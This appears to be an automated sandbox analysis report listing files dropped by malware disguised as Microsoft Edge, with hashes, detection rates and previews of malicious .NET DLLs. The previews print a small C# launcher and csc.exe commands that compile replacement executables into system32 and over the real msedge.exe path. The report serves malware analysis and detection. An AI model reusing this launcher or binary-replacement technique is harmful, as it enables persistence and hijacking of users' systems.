                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):406
                                                                                                                                                                        Entropy (8bit):5.074232246568697
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLAZ9EeiFkD:JNVQIbSfhV7TiFkMSfhs9E/FkD
                                                                                                                                                                        MD5:F4D2939E9C4EFDB64721F442C43E30F4
                                                                                                                                                                        SHA1:736790F2C43A3540DEBBB5AAC957AD3C0FCF2953
                                                                                                                                                                        SHA-256:7801DB3A8A0D46179E04236581672751C4D484ECA085AEFBE01AB8DE6FC9321A
                                                                                                                                                                        SHA-512:415558BB0C2B2F8C4938E31A2BC3C9D593EC7DB34A71AB91CEEB09B95042E47FA3A15B5A23042703D3B73710C99D33770059B4854647EDDC35BA19B44076C565
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                        Entropy (8bit):5.124016607736197
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fUm:Hu7L//TRq79cQlZX
                                                                                                                                                                        MD5:F2ADE908BD12C38E559CB1724D69F57A
                                                                                                                                                                        SHA1:99C6B98729CC9EA58ACE8B49062795BFCB92F940
                                                                                                                                                                        SHA-256:F5B58254C72A97A2CBE40D207E8FA50E60876B0E1E4E40468BEBEC464EB0F3DC
                                                                                                                                                                        SHA-512:379CA7139BF97E3B92CFAC1C5B05FE778D8EF7D149FC97822DE2748EE7DF65D4CD80E2FBE46FA7244CA88B9C4A1879ACC672CF0E4021DE9623F7BA3567D7E0CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.0.cs"
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (318), with CRLF, CR line terminators
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):739
                                                                                                                                                                        Entropy (8bit):5.267654570677332
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:apI/u7L//TRq79cQlZeKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDeKax5DqBVKVrdFAMBJj
                                                                                                                                                                        MD5:79DE9C0113EC32DBDC2944293614D9F2
                                                                                                                                                                        SHA1:F56E4DC98445F6019F3F3BD517DE83248F43FB49
                                                                                                                                                                        SHA-256:D95E89490EB4F81625F11C527EEDAB48E15ABBB10A697AF46CE1DC68725B21BD
                                                                                                                                                                        SHA-512:39C1AFED59E725BCE6AA85E4DEBD5C05350A37DFD896D0FB8B6E93C027ECF1769EE70A7B3EDAF25602ACAB9A5733B811AE60EC10FBDFE31F52DDD89095468028
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):421
                                                                                                                                                                        Entropy (8bit):5.087401750375484
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLAZ9EeiFkD:JNVQIbSfhWLzIiFkMSfhs9E/FkD
                                                                                                                                                                        MD5:E4D8D234B89D4275BBAB709DFC6BF8DC
                                                                                                                                                                        SHA1:B0A0860D0CB417006E180ACE5A282715FF2E3E73
                                                                                                                                                                        SHA-256:F97FE54A19650CDEDD52E9F02A55B81CB423E9B46231ACA30B7952F141707D77
                                                                                                                                                                        SHA-512:D221DCA457AC3F174AFA2ECE97736F6383F5C76B3CDBFD29B3F835C7567EF73219187077A82FE54F6D55A60B86EAFAC73228045891EEB49B6A28CA69AE606660
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):269
                                                                                                                                                                        Entropy (8bit):5.175808893658482
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fzNx:Hu7L//TRRzscQlZr
                                                                                                                                                                        MD5:3FA53B6BBE776D5B4A361A017282311B
                                                                                                                                                                        SHA1:391B18EFC48DD7856225CD04255104155542FE5D
                                                                                                                                                                        SHA-256:6C7774EDFEC99C3666471D4CB43698FE799C29E03F5143FC858214823E74846C
                                                                                                                                                                        SHA-512:6D842F93544F0F139FD6E59228C1AD26820841F2D867D5026EA33DD8BDE98430DD87B58A0228545580DA5C1431E9D3E1430350E12EE1ACA60EA6BF2106514169
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.0.cs"
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF, CR line terminators
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):754
                                                                                                                                                                        Entropy (8bit):5.274693290085745
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:apI/u7L//TRRzscQlZqKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDqKax5DqBVKVrdFAMBJj
                                                                                                                                                                        MD5:89C3A721B5A212A6E45223285591A012
                                                                                                                                                                        SHA1:D3EAD0370FF4EA54536E0FA850C2526D31E94DA5
                                                                                                                                                                        SHA-256:1556B41D726B358EE31992384AD858228416241A4A3F98BA3B8E3AA7843E0B0F
                                                                                                                                                                        SHA-512:B2E927A8EC15EAB739B30FBA5ABD65E4A557C104A21A9F7308048CBA9DB7CC9ACFE1DEE7DA555C723D02E6241165F57CE2AFC1F5757254E3DC3421D82FFF99CB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: p3f932IsTO.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: UpU2O6YQxG.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 5WbBcHi91R.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 4LU843t3Vt.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: ggJWCFp2S3.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: yQrCGtNgsf.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: qDlkXj5kcZ.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: C0laqZmkEf.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):85504
                                                                                                                                                                        Entropy (8bit):5.8769270258874755
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32256
                                                                                                                                                                        Entropy (8bit):5.631194486392901
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):85504
                                                                                                                                                                        Entropy (8bit):5.8769270258874755
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23552
                                                                                                                                                                        Entropy (8bit):5.519109060441589
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23552
                                                                                                                                                                        Entropy (8bit):5.519109060441589
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):85504
                                                                                                                                                                        Entropy (8bit):5.8769270258874755
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                        Process:C:\Edge\msedge.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
